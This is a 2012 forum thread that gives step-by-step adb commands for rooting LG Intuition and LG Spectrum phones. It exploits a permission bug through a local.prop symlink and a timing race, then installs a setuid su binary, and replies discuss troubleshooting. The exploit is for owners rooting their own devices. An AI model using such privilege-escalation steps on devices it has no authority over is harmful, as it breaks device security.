Post Reply

[ROOT] LG Intuition & LG Spectrum ICS

OP jcase

30th September 2012, 12:58 AM   |  #1  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,074
 
3,863 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Source: http://www.androidpolice.com/2012/09...ectrum-on-ics/

If you find this useful please follow me (jcase) on twitter ( https://twitter.com/teamandirc/ ).

Here you go, root for both the new LG Intuition and the LG Spectrum running ICS. The vulnerability is a simple permission bug allowing us to setup a symlink to local.prop (yes yet again). While the bug is the same, the procedure is slightly different, so I will have the instructions separate.

With the LG Intuition, they did seem to attempt to mitigate this attack. Not by setting correct permissions, but by dropping adbD to the shell user if it runs as root, even if ro.kernel.qemu=1 is set. They failed, they give us enough time to run one command before dropping the root privileges, in our case a script to root the phone.

LG Spectrum ICS Root (for the leaked ICS rom):
Expect this to be patched in the release rom. Leaked ICS rom has locked bootlaoders, ie no recovery at this point.

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )

adb shell

$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

adb reboot

adb wait-for-device remount
adb push su /system/xbin/su
adb shell

# chown 0.0 /system/xbin/su
# chmod 06755 /system/xbin/su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.







LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

Here is the important part, you will have to execute the next to commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take some a few minutes, and after the second command is complete you may have to unplug/replug you phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has ran).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.
Last edited by jcase; 30th September 2012 at 03:51 PM.
The Following 2 Users Say Thank You to jcase For This Useful Post: [ View ]
30th September 2012, 02:17 AM   |  #2  
LostCauseSPM's Avatar
Junior Member
Thanks Meter: 0
 
6 posts
Join Date:Joined: Jan 2012
More
Thanks!
Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So i tried inputting it line by line and i keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!
30th September 2012, 02:36 AM   |  #3  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,074
 
3,863 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by LostCauseSPM

Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So i tried inputting it line by line and i keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!

Which specific ICS version do you have, I had a couple different leaks to work with.
30th September 2012, 02:53 AM   |  #4  
LostCauseSPM's Avatar
Junior Member
Thanks Meter: 0
 
6 posts
Join Date:Joined: Jan 2012
More
Quote:
Originally Posted by jcase

Which specific ICS version do you have, I had a couple different leaks to work with.

build #: IMM76D
Still tweeking on it. Just updated all my drivers, too. I'm not a total newb, but I'm no pro, either.
30th September 2012, 02:56 AM   |  #5  
Senior Member
fort campbell ky
Thanks Meter: 98
 
375 posts
Join Date:Joined: Apr 2010
More
Unhappy
Quote:
Originally Posted by jcase

Source: http://www.androidpolice.com/2012/09...ectrum-on-ics/


LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo ‘ro.kernel.qemu=1’ > /data/local.prop
$ exit

Here is the important part, you will have to execute the next to commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take some a few minutes, and after the second command is complete you may have to unplug/replug you phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has ran).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.

i tried but as soon as i entered adb shell it kick me off and haven't been able to try since
30th September 2012, 03:37 AM   |  #6  
LostCauseSPM's Avatar
Junior Member
Thanks Meter: 0
 
6 posts
Join Date:Joined: Jan 2012
More
Quote:
Originally Posted by jcase

Which specific ICS version do you have, I had a couple different leaks to work with.

Ive got the spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.
30th September 2012, 03:41 AM   |  #7  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,074
 
3,863 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by LostCauseSPM

Ive got the spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.

add jcase@cunninglogic.com to gltak and hit me up.
30th September 2012, 03:42 AM   |  #8  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,074
 
3,863 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by lahegry

i tried but as soon as i entered adb shell it kick me off and haven't been able to try since

unplug/replug, The intuition is very touchy. Might need to do it from another system or with another cable.
30th September 2012, 03:45 AM   |  #9  
Senior Member
fort campbell ky
Thanks Meter: 98
 
375 posts
Join Date:Joined: Apr 2010
More
Quote:
Originally Posted by jcase

unplug/replug, The intuition is very touchy. Might need to do it from another system or with another cable.

i don't think i'm fast enough, i just can't type faster than it kicks me off
30th September 2012, 03:55 AM   |  #10  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,074
 
3,863 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by lahegry

i don't think i'm fast enough, i just can't type faster than it kicks me off

Place the two commands into a batch file/shell script, or setup teamviewer and msg me on gtalk

Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Top Threads in Android Software and Hacking General [Developers Only] by ThreadRank